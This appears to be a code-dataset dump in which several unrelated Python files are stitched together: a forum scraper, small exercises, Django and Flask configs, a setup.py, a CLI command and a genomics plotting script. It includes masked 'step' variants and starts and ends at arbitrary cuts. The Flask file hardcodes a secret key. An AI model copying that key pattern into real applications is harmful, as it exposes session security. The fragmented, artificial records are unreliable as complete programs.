str(pagenum)\n\ndef get_posts(page_soup):\n\n page_soup = bs(page_soup)\n\n\n #page _ of _\n page_count = page_soup.find('td', attrs={'class':'vbmenu_control'})\n if page_count:\n page_count = page_count.getText()\n page_match = re.search(r'(\\d+) .+? (\\d+)', page_count)\n if page_match:\n page_count = int(page_match.group(2))\n page = int(page_match.group(1))\n else:\n page_count = 1\n page = 1\n posts = page_soup.findAll('table', attrs={'id':lambda x: x and re.match(r'post', x)})\n logging.info('get_post: got %d posts' % len(posts))\n post_list = []\n for p in posts:\n post_link = p.find('a', attrs={'name': lambda x: x and re.match(r'\\d+', x)})['href']\n post_string = str(p)\n raw_message = extract(post_string, message_marker[0], message_marker[1])\n\n date = extract(post_string, date_marker[0], date_marker[1])\n date = strip_tags(date).strip()\n message = get_message(raw_message)\n sig = extract(post_string, sig_marker[0], sig_marker[1])\n edit = extract(post_string, edit_marker[0], edit_marker[1])\n\n msg_image_srcs = imaget.get_image_src(raw_message)\n if msg_image_srcs: msg_image_srcs = msg_image_srcs[0]\n print \"message source: \" \n print msg_image_srcs\n print \"\\n\\n\\n\"\n\n user = get_user(post_string, sig)\n\n post_list.append({'date': date, 'message': message, 'edit': edit, 'message images': msg_image_srcs, 'user': user, 'link': post_link})\n\n return post_list, (page, page_count)\n\n\n\ndef get_user(post_string, sig = \"\"):\n\n user_tag = bs(post_string).find('td', attrs={'class':'alt2'})\n user_link = user_tag.find('a', attrs={'class':'bigusername'})\n if not user_link: return {'tag': user_tag, 'name': 'guest', 'link': None, 'join': None, 'sig': None, 'image': None, 'title': 'guest'}\n user_name = user_link.getText()\n user_link = user_link['href']\n user_title = user_tag.findAll('div')[1].getText()\n \n user_div = user_tag.findAll('div')\n inner_ind = 2\n while len(user_div[inner_ind].findAll('div'))<3:\n inner_ind+=1\n inner_name_soup = user_div[inner_ind].findAll('div')\n join_date = inner_name_soup[0].getText()[len(\"Join Date: \"):]\n\n user_image_src = imaget.get_image_src(user_tag, 1)\n\n return {'tag': user_tag, 'name':user_name, 'link': user_link, 'title': user_title, 'join': join_date, 'sig': sig, 'image': user_image_src}\n\n \n \n\ndef get_message(message_str):\n message_soup = bs(message_str)\n images = message_soup.findAll('img')\n for item in images:\n item.extract()\n scripts = message_soup.findAll('script')\n for item in scripts:\n item.extract()\n return str(message_soup)\n \n \n\ndef extract(string, start_marker, end_marker):\n \"\"\"wrapper function for slicing into a string\"\"\"\n start_loc = string.find(start_marker)\n end_loc = string.find(end_marker)\n if start_loc == -1 or end_loc == -1:\n return \"\"\n return string[start_loc+len(start_marker):end_loc]\n\ndef strip_tags(source):\n return re.sub(r'<.+?>', '', source) \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from datetime import date
atual = date.today().year
totmaior = 0
totmenor = 0
for pessoas in range(1, 8):
nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))
idade = atual - nasc
if idade >= 21:
totmaior += 1
else:
totmenor += 1
print(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')
print(f'E tambem tivemos {totmenor} pessoas menores de idade!')
|
normal
|
{
"blob_id": "f6d7ce2d020d11086640a34aac656098ab0b0f33",
"index": 9495,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor pessoas in range(1, 8):\n nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))\n idade = atual - nasc\n if idade >= 21:\n totmaior += 1\n else:\n totmenor += 1\nprint(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')\nprint(f'E tambem tivemos {totmenor} pessoas menores de idade!')\n",
"step-3": "<mask token>\natual = date.today().year\ntotmaior = 0\ntotmenor = 0\nfor pessoas in range(1, 8):\n nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))\n idade = atual - nasc\n if idade >= 21:\n totmaior += 1\n else:\n totmenor += 1\nprint(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')\nprint(f'E tambem tivemos {totmenor} pessoas menores de idade!')\n",
"step-4": "from datetime import date\natual = date.today().year\ntotmaior = 0\ntotmenor = 0\nfor pessoas in range(1, 8):\n nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))\n idade = atual - nasc\n if idade >= 21:\n totmaior += 1\n else:\n totmenor += 1\nprint(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')\nprint(f'E tambem tivemos {totmenor} pessoas menores de idade!')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding:utf-8 -*-
# Author: washing
# DateTime: 2022/5/18 10:28
# File: 0668.py
# Desc: CV
class Solution:
def findKthNumber(self, m: int, n: int, k: int) -> int:
return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(x // i for i in range(x // n + 1, m + 1)))
|
normal
|
{
"blob_id": "ec9efeca7eef7b8ee25c1e089e675bdb1e53413b",
"index": 417,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def findKthNumber(self, m: int, n: int, k: int) ->int:\n return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(\n x // i for i in range(x // n + 1, m + 1)))\n",
"step-4": "# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/5/18 10:28\r\n# File: 0668.py\r\n# Desc: CV\r\n\r\nclass Solution:\r\n def findKthNumber(self, m: int, n: int, k: int) -> int:\r\n return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(x // i for i in range(x // n + 1, m + 1)))\r\n\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""lendbooks URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework_jwt.views import obtain_jwt_token
urlpatterns = [
url(r'^admin/', admin.site.urls), # Django Admin
url(r'^', include('books.urls')), # Books Management
url(r'^', include('borrowed_books.urls')), # Borrow Books
url(r'^', include('reviews.urls')), # Reviews
url(r'^', include('api_root.urls')),
url(r'^api-token-auth/', obtain_jwt_token), # JWT
url(r'^', include('django.contrib.auth.urls')), # Django's own Auth'
url(r'^account/', include('rest_auth.urls')), # Account Management
url(r'^account/registration/', include('rest_auth.registration.urls')), # Account Registration
]
urlpatterns += [
url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
]
|
normal
|
{
"blob_id": "9e950f6fe895cfd497e94139397e8a0f19725dc0",
"index": 1902,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns += [url('^api-auth/', include('rest_framework.urls', namespace=\n 'rest_framework'))]\n",
"step-3": "<mask token>\nurlpatterns = [url('^admin/', admin.site.urls), url('^', include(\n 'books.urls')), url('^', include('borrowed_books.urls')), url('^',\n include('reviews.urls')), url('^', include('api_root.urls')), url(\n '^api-token-auth/', obtain_jwt_token), url('^', include(\n 'django.contrib.auth.urls')), url('^account/', include('rest_auth.urls'\n )), url('^account/registration/', include('rest_auth.registration.urls'))]\nurlpatterns += [url('^api-auth/', include('rest_framework.urls', namespace=\n 'rest_framework'))]\n",
"step-4": "<mask token>\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework_jwt.views import obtain_jwt_token\nurlpatterns = [url('^admin/', admin.site.urls), url('^', include(\n 'books.urls')), url('^', include('borrowed_books.urls')), url('^',\n include('reviews.urls')), url('^', include('api_root.urls')), url(\n '^api-token-auth/', obtain_jwt_token), url('^', include(\n 'django.contrib.auth.urls')), url('^account/', include('rest_auth.urls'\n )), url('^account/registration/', include('rest_auth.registration.urls'))]\nurlpatterns += [url('^api-auth/', include('rest_framework.urls', namespace=\n 'rest_framework'))]\n",
"step-5": "\"\"\"lendbooks URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls), # Django Admin\n url(r'^', include('books.urls')), # Books Management\n url(r'^', include('borrowed_books.urls')), # Borrow Books\n url(r'^', include('reviews.urls')), # Reviews\n url(r'^', include('api_root.urls')), \n url(r'^api-token-auth/', obtain_jwt_token), # JWT\n url(r'^', include('django.contrib.auth.urls')), # Django's own Auth'\n url(r'^account/', include('rest_auth.urls')), # Account Management\n url(r'^account/registration/', include('rest_auth.registration.urls')), # Account Registration\n]\n\nurlpatterns += [\n url(r'^api-auth/', include('rest_framework.urls',\n namespace='rest_framework')),\n]\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import sys
import setuptools
from distutils.core import setup
with open("README.md", "r") as fh:
long_description = fh.read()
def get_info():
init_file = 'PIKACHU/__init__.py'
with open(init_file, 'r') as f:
for line in f.readlines():
if "=" in line:
exec(compile(line, "", 'exec'))
return locals()['name'], locals()['author'], locals()['version']
NAME, AUTHOR, VERSION = get_info()
sys.dont_write_bytecode = True
setuptools.setup(
name=NAME,
version=VERSION,
author=AUTHOR,
author_email="[email protected]",
description="a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/smilefufu/PIKACHU",
data_files = [("", ["LICENSE"])],
packages=setuptools.find_packages(),
install_requires=[
"pika",
],
classifiers=(
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Operating System :: OS Independent'
),
)
|
normal
|
{
"blob_id": "f14ff29a1a76c2916cb211c476a56aaa5061bf71",
"index": 8837,
"step-1": "<mask token>\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\n<mask token>\n",
"step-2": "<mask token>\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\n<mask token>\nsetuptools.setup(name=NAME, version=VERSION, author=AUTHOR, author_email=\n '[email protected]', description=\n 'a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)',\n long_description=long_description, long_description_content_type=\n 'text/markdown', url='https://github.com/smilefufu/PIKACHU', data_files\n =[('', ['LICENSE'])], packages=setuptools.find_packages(),\n install_requires=['pika'], classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'))\n",
"step-3": "<mask token>\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\nNAME, AUTHOR, VERSION = get_info()\nsys.dont_write_bytecode = True\nsetuptools.setup(name=NAME, version=VERSION, author=AUTHOR, author_email=\n '[email protected]', description=\n 'a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)',\n long_description=long_description, long_description_content_type=\n 'text/markdown', url='https://github.com/smilefufu/PIKACHU', data_files\n =[('', ['LICENSE'])], packages=setuptools.find_packages(),\n install_requires=['pika'], classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'))\n",
"step-4": "import sys\nimport setuptools\nfrom distutils.core import setup\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\nNAME, AUTHOR, VERSION = get_info()\nsys.dont_write_bytecode = True\nsetuptools.setup(name=NAME, version=VERSION, author=AUTHOR, author_email=\n '[email protected]', description=\n 'a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)',\n long_description=long_description, long_description_content_type=\n 'text/markdown', url='https://github.com/smilefufu/PIKACHU', data_files\n =[('', ['LICENSE'])], packages=setuptools.find_packages(),\n install_requires=['pika'], classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'))\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport sys\nimport setuptools\nfrom distutils.core import setup\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if \"=\" in line:\n exec(compile(line, \"\", 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\nNAME, AUTHOR, VERSION = get_info()\n\nsys.dont_write_bytecode = True\nsetuptools.setup(\n name=NAME,\n version=VERSION,\n author=AUTHOR,\n author_email=\"[email protected]\",\n description=\"a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/smilefufu/PIKACHU\",\n data_files = [(\"\", [\"LICENSE\"])],\n packages=setuptools.find_packages(),\n install_requires=[\n \"pika\",\n ],\n classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'\n ),\n)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import copy
import six
from eclcli.common import command
from eclcli.common import utils
from eclcli.storage.storageclient import exceptions
class ListVolumeType(command.Lister):
def get_parser(self, prog_name):
parser = super(ListVolumeType, self).get_parser(prog_name)
parser.add_argument(
"--name",
metavar="<string>",
help="Filter results by virtual storage name")
return parser
def take_action(self, parsed_args):
storage_client = self.app.client_manager.storage
search_opts = {
'display_name': parsed_args.name,
}
columns = ['ID', 'Name', 'available_volume_size',
'available_volume_throughput',
'available_iops_per_gb']
column_headers = copy.deepcopy(columns)
data = storage_client.volume_types.list(search_opts=search_opts)
if parsed_args.name is not None:
data = utils.filter_list_with_property(data, "name", parsed_args.name)
for vtype in data:
for key, value in vtype.extra_specs.items():
setattr(vtype, key, value)
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in data))
class ShowVolumeType(command.ShowOne):
def get_parser(self, prog_name):
parser = super(ShowVolumeType, self).get_parser(prog_name)
parser.add_argument(
"volume_type",
metavar="VOLUME_TYPE_ID",
help="volume type to display (ID)")
return parser
def take_action(self, parsed_args):
storage_client = self.app.client_manager.storage
try:
volume_type = storage_client.volume_types.get(parsed_args.volume_type)
printout = volume_type._info
for key, value in printout.get("extra_specs").items():
printout[key] = copy.copy(value)
del printout["extra_specs"]
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
|
normal
|
{
"blob_id": "c73bea686786a30f298500968cfd01e2d5125d75",
"index": 4013,
"step-1": "<mask token>\n\n\nclass ListVolumeType(command.Lister):\n <mask token>\n <mask token>\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-2": "<mask token>\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument('--name', metavar='<string>', help=\n 'Filter results by virtual storage name')\n return parser\n <mask token>\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-3": "<mask token>\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument('--name', metavar='<string>', help=\n 'Filter results by virtual storage name')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n search_opts = {'display_name': parsed_args.name}\n columns = ['ID', 'Name', 'available_volume_size',\n 'available_volume_throughput', 'available_iops_per_gb']\n column_headers = copy.deepcopy(columns)\n data = storage_client.volume_types.list(search_opts=search_opts)\n if parsed_args.name is not None:\n data = utils.filter_list_with_property(data, 'name',\n parsed_args.name)\n for vtype in data:\n for key, value in vtype.extra_specs.items():\n setattr(vtype, key, value)\n return column_headers, (utils.get_item_properties(s, columns) for s in\n data)\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-4": "import copy\nimport six\nfrom eclcli.common import command\nfrom eclcli.common import utils\nfrom eclcli.storage.storageclient import exceptions\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument('--name', metavar='<string>', help=\n 'Filter results by virtual storage name')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n search_opts = {'display_name': parsed_args.name}\n columns = ['ID', 'Name', 'available_volume_size',\n 'available_volume_throughput', 'available_iops_per_gb']\n column_headers = copy.deepcopy(columns)\n data = storage_client.volume_types.list(search_opts=search_opts)\n if parsed_args.name is not None:\n data = utils.filter_list_with_property(data, 'name',\n parsed_args.name)\n for vtype in data:\n for key, value in vtype.extra_specs.items():\n setattr(vtype, key, value)\n return column_headers, (utils.get_item_properties(s, columns) for s in\n data)\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-5": "import copy\n\nimport six\n\nfrom eclcli.common import command\nfrom eclcli.common import utils\nfrom eclcli.storage.storageclient import exceptions\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument(\n \"--name\",\n metavar=\"<string>\",\n help=\"Filter results by virtual storage name\")\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n\n search_opts = {\n 'display_name': parsed_args.name,\n }\n\n columns = ['ID', 'Name', 'available_volume_size',\n 'available_volume_throughput',\n 'available_iops_per_gb']\n column_headers = copy.deepcopy(columns)\n\n data = storage_client.volume_types.list(search_opts=search_opts)\n\n if parsed_args.name is not None:\n data = utils.filter_list_with_property(data, \"name\", parsed_args.name)\n\n for vtype in data:\n for key, value in vtype.extra_specs.items():\n setattr(vtype, key, value)\n\n return (column_headers,\n (utils.get_item_properties(\n s, columns,\n ) for s in data))\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument(\n \"volume_type\",\n metavar=\"VOLUME_TYPE_ID\",\n help=\"volume type to display (ID)\")\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.volume_type)\n printout = volume_type._info\n for key, value in printout.get(\"extra_specs\").items():\n printout[key] = copy.copy(value)\n del printout[\"extra_specs\"]\n except exceptions.ClientException as clientexp:\n printout = {\"message\": clientexp.message,\n \"details\": clientexp.details,\n \"code\": clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from flask import Flask, render_template
from config import Config
from flask_bootstrap import Bootstrap
from config import config_options
from flask_login import LoginManager
from flask_wtf.csrf import CSRFProtect
from flask_sqlalchemy import SQLAlchemy
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.loginview = 'auth.login'
bootstrap = Bootstrap()
csrf=CSRFProtect()
db = SQLAlchemy()
def create_app(config_name):
app= Flask(__name__)
#create app configs
app.config.from_object(Config)
app.config.from_object(config_options[config_name])
app.config['SECRET_KEY']='d686414d5eeb7d38df7e8c385b2c2c47'
#initializing
bootstrap.init_app(app)
csrf.init_app(app)
db.init_app(app)
#registering
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix = '/authenticate')
return app
|
normal
|
{
"blob_id": "2eecc852a6438db19e0ed55ba6cc6610d76c6ed0",
"index": 2207,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_app(config_name):\n app = Flask(__name__)\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY'] = 'd686414d5eeb7d38df7e8c385b2c2c47'\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix='/authenticate')\n return app\n",
"step-3": "<mask token>\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.loginview = 'auth.login'\nbootstrap = Bootstrap()\ncsrf = CSRFProtect()\ndb = SQLAlchemy()\n\n\ndef create_app(config_name):\n app = Flask(__name__)\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY'] = 'd686414d5eeb7d38df7e8c385b2c2c47'\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix='/authenticate')\n return app\n",
"step-4": "from flask import Flask, render_template\nfrom config import Config\nfrom flask_bootstrap import Bootstrap\nfrom config import config_options\nfrom flask_login import LoginManager\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.loginview = 'auth.login'\nbootstrap = Bootstrap()\ncsrf = CSRFProtect()\ndb = SQLAlchemy()\n\n\ndef create_app(config_name):\n app = Flask(__name__)\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY'] = 'd686414d5eeb7d38df7e8c385b2c2c47'\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix='/authenticate')\n return app\n",
"step-5": "from flask import Flask, render_template\nfrom config import Config\nfrom flask_bootstrap import Bootstrap\nfrom config import config_options\nfrom flask_login import LoginManager\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.loginview = 'auth.login'\n\nbootstrap = Bootstrap()\ncsrf=CSRFProtect()\ndb = SQLAlchemy()\n\ndef create_app(config_name):\n \n app= Flask(__name__)\n\n #create app configs\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY']='d686414d5eeb7d38df7e8c385b2c2c47'\n \n #initializing\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n \n #registering\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n \n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix = '/authenticate')\n\n \n return app",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys,argparse
import os,glob
import numpy as np
import pandas as pd
import re,bisect
from scipy import stats
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt
matplotlib.rcParams['font.size']=11
import seaborn as sns
sns.set(font_scale=1.1)
sns.set_style("whitegrid", {'axes.grid' : False})
sns.set_style("ticks",{'ytick.color': 'k','axes.edgecolor': 'k'})
matplotlib.rcParams["font.sans-serif"] = ["Arial"]
matplotlib.rcParams['mathtext.fontset'] = 'custom'
matplotlib.rcParams["mathtext.rm"] = "Arial"
# def return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):
# dci_file = '{}/{}/{}_{}{}.bed'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)
# dci_df = pd.read_csv(dci_file,sep='\t',header=None)
# dci_df.columns=['chr','start','end','DCI']
# dci_df.index = ['_'.join(ii) for ii in dci_df[['chr','start','end']].values.astype(str)]
# return dci_df
def return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):
dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)
if os.path.isfile(dci_file):
dci_df = pd.read_csv(dci_file,sep='\t',index_col=4)
dci_df.columns=['chr','start','end','IfOverlap','score','strand','DCI']
return dci_df
else:
return None
def scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre):
compr_x = compr_type[0]
compr_y = compr_type[1]
test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_y,suffix)
# print(test_file)
if os.path.isfile(test_file):
dci_df_wt_over_vector = return_dci_df(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)
up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']>dci_thre].index
dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']<-1*dci_thre].index
dci_df_x = return_dci_df(DCI_dir,subdir,hm_mark,compr_x,suffix)
dci_df_y = return_dci_df(DCI_dir,subdir,hm_mark,compr_y,suffix)
# scatter plot
plt.figure(figsize=(2.1,2.1))
plt.scatter(dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI'],c='tab:grey',s=3,alpha=1,rasterized=True,label='All genes')
plt.scatter(dci_df_x.loc[up_bins,'DCI'],dci_df_y.loc[up_bins,'DCI'],c='tab:red',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))
